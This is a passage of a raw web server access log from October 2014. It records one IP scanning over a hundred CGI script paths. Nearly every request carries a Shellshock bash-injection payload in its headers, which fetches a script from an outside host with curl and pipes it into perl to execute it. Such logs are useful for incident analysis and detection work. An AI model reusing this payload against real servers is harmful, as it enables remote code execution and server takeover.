http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:27 +0200] "GET /cgi-sys/FormMail-clone.cgi HTTP/1.0" 404 464 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:28 +0200] "GET /cgi-sys/entropybanner.cgi HTTP/1.0" 404 463 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:29 +0200] "GET /cgi-sys/domainredirect.cgi HTTP/1.0" 404 464 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:29 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 464 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:31 +0200] "GET /cgi-mod/index.cgi HTTP/1.0" 404 455 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:33 +0200] "GET /cgi-bin/wwwboard.cgi.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:31 +0200] "GET /cgi-bin/zml.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:32 +0200] "GET /cgi-bin/YaBB/YaBB.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:34 +0200] "GET /cgi-bin/wrap.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:37 +0200] "GET /cgi-bin/whois_raw.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:36 +0200] "GET /cgi-bin/wrapHTTP/1.0" 503 323 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:22:37 +0200] "GET /cgi-bin/whois/whois.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:39 +0200] "GET /cgi-bin/whois.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:40 +0200] "GET /cgi-bin/webspirs.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:40 +0200] "GET /cgi-bin/webmap.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:43 +0200] "GET /cgi-bin/webif.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:42 +0200] "GET /cgi-bin/webmail/html/emumail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:43 +0200] "GET /cgi-bin/webdist.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:45 +0200] "GET /cgi-bin/webcart/webcart.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:46 +0200] "GET /cgi-bin/webbbs.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:46 +0200] "GET /cgi-bin/way-board/way-board.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:48 +0200] "GET /cgi-bin/way-board.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:49 +0200] "GET /cgi-bin/w3mman2html.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:49 +0200] "GET /cgi-bin/vpasswd.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:52 +0200] "GET /cgi-bin/virgil.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:52 +0200] "GET /cgi-bin/viralator.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:54 +0200] "GET /cgi-bin/viewcvs.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:55 +0200] "GET /cgi-bin/urlcount.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:58 +0200] "GET /cgi-bin/ttawebtop.cgi/HTTP/1.0" 503 323 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:22:55 +0200] "GET /cgi-bin/upload.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:57 +0200] "GET /cgi-bin/ultraboard.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:22:58 +0200] "GET /cgi-bin/troops.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:01 +0200] "GET /cgi-bin/title.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:01 +0200] "GET /cgi-bin/tigvote.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:04 +0200] "GET /cgi-bin/testing_whateverHTTP/1.0" 503 323 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:23:04 +0200] "GET /cgi-bin/test2.plHTTP/1.0" 503 323 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:23:06 +0200] "GET /cgi-bin/test/test.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:07 +0200] "GET /cgi-bin/test.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:08 +0200] "GET /cgi-bin/technote/main.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:10 +0200] "GET /cgi-bin/talkback.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:10 +0200] "GET /cgi-bin/survey.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:12 +0200] "GET /cgi-bin/store/index.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:13 +0200] "GET /cgi-bin/store/agora.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:15 +0200] "GET /cgi-bin/start.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:16 +0200] "GET /cgi-bin/spin_client.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:18 +0200] "GET /cgi-bin/snorkerz.cmdHTTP/1.0" 503 323 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:23:19 +0200] "GET /cgi-bin/snorkerz.batHTTP/1.0" 503 323 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:23:20 +0200] "GET /cgi-bin/smartsearch/smartsearch.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:21 +0200] "GET /cgi-bin/smartsearch.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:22 +0200] "GET /cgi-bin/simplestmail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:24 +0200] "GET /cgi-bin/simplestguest.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:24 +0200] "GET /cgi-bin/showcheckins.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:25 +0200] "GET /cgi-bin/shopplus.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:27 +0200] "GET /cgi-bin/shopper.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:27 +0200] "GET /cgi-bin/shop.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:28 +0200] "GET /cgi-bin/sendform.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:31 +0200] "GET /cgi-bin/search.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:32 +0200] "GET /cgi-bin/searchHTTP/1.0" 503 323 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:23:33 +0200] "GET /cgi-bin/scoadminreg.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:34 +0200] "GET /cgi-bin/sbcgi/sitebuilder.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:35 +0200] "GET /cgi-bin/robpoll.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:39 +0200] "GET /cgi-bin/replicator/webpage.cgi/HTTP/1.0" 503 323 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:23:36 +0200] "GET /cgi-bin/robadmin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:37 +0200] "GET /cgi-bin/responder.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:40 +0200] "GET /cgi-bin/ratlog.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:39 +0200] "GET /cgi-bin/register.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:44 +0200] "GET /cgi-bin/quickstore.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:43 +0200] "GET /cgi-bin/quizme.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:45 +0200] "GET /cgi-bin/publisher/search.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:46 +0200] "GET /cgi-bin/profile.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:47 +0200] "GET /cgi-bin/probecontrol.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:48 +0200] "GET /cgi-bin/printenvHTTP/1.0" 503 323 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:23:51 +0200] "GET /cgi-bin/postcards.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:49 +0200] "GET /cgi-bin/powerup/r.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:51 +0200] "GET /cgi-bin/pollssi.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:52 +0200] "GET /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:54 +0200] "GET /cgi-bin/php.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:54 +0200] "GET /cgi-bin/photo/protected/manage.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:55 +0200] "GET /cgi-bin/photo/manage.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:23:59 +0200] "GET /cgi-bin/pfdispaly.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:00 +0200] "GET /cgi-bin/perlshop.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:00 +0200] "GET /cgi-bin/pbcgi.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:01 +0200] "GET /cgi-bin/pagelog.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:01 +0200] "GET /cgi-bin/nph-test.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:01 +0200] "GET /cgi-bin/nph-publish.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:02 +0200] "GET /cgi-bin/nph-exploitscanget.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:02 +0200] "GET /cgi-bin/nph-emumail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:03 +0200] "GET /cgi-bin/nlog-smb.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:03 +0200] "GET /cgi-bin/newsdesk.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:04 +0200] "GET /cgi-bin/netpad.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:04 +0200] "GET /cgi-bin/netauth.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:04 +0200] "GET /cgi-bin/myguestbook.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:05 +0200] "GET /cgi-bin/musicqueue.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:05 +0200] "GET /cgi-bin/mt/mt-load.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:06 +0200] "GET /cgi-bin/mt/mt-check.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:06 +0200] "GET /cgi-bin/mt-static/mt-load.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:07 +0200] "GET /cgi-bin/mrtg.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:08 +0200] "GET /cgi-bin/mojo/mojo.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:08 +0200] "GET /cgi-bin/moin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:09 +0200] "GET /cgi-bin/mmstdod.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:09 +0200] "GET /cgi-bin/mini_logger.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:09 +0200] "GET /cgi-bin/man.shHTTP/1.0" 503 323 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:24:10 +0200] "GET /cgi-bin/main_menu.plHTTP/1.0" 503 323 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:24:10 +0200] "GET /cgi-bin/main.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:11 +0200] "GET /cgi-bin/mailnews.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:12 +0200] "GET /cgi-bin/mail/nph-mr.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:12 +0200] "GET /cgi-bin/mail/emumail.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:13 +0200] "GET /cgi-bin/magiccard.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:13 +0200] "GET /cgi-bin/MachineInfoHTTP/1.0" 503 323 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:24:14 +0200] "GET /cgi-bin/lwgate.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:15 +0200] "GET /cgi-bin/logit.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:15 +0200] "GET /cgi-bin/login.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:16 +0200] "GET /cgi-bin/log-reader.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:17 +0200] "GET /cgi-bin/lastlines.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:18 +0200] "GET /cgi-bin/journal.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:18 +0200] "GET /cgi-bin/jammail.plHTTP/1.0" 503 323 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:24:18 +0200] "GET /cgi-bin/infosrch.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:19 +0200] "GET /cgi-bin/ImageFolio/admin/admin.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:19 +0200] "GET /cgi-bin/imageFolio.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:20 +0200] "GET /cgi-bin/ikonboard/help.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:20 +0200] "GET /cgi-bin/if/admin/nph-build.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" +66.172.64.22 - - [31/Oct/2014:01:24:20 +0200] "GET /cgi-bin/icatHTTP/1.0" 503 323 "-" "-" +66.172.64.22 - - [31/Oct/2014:01:24:22 +0200] "GET /cgi-bin/html2wml.cgi HTTP/1.0" 503 516 "() { :; }; curl http://202.143.160.141/lib21/index.cgi | perl" "() { :; }; curl 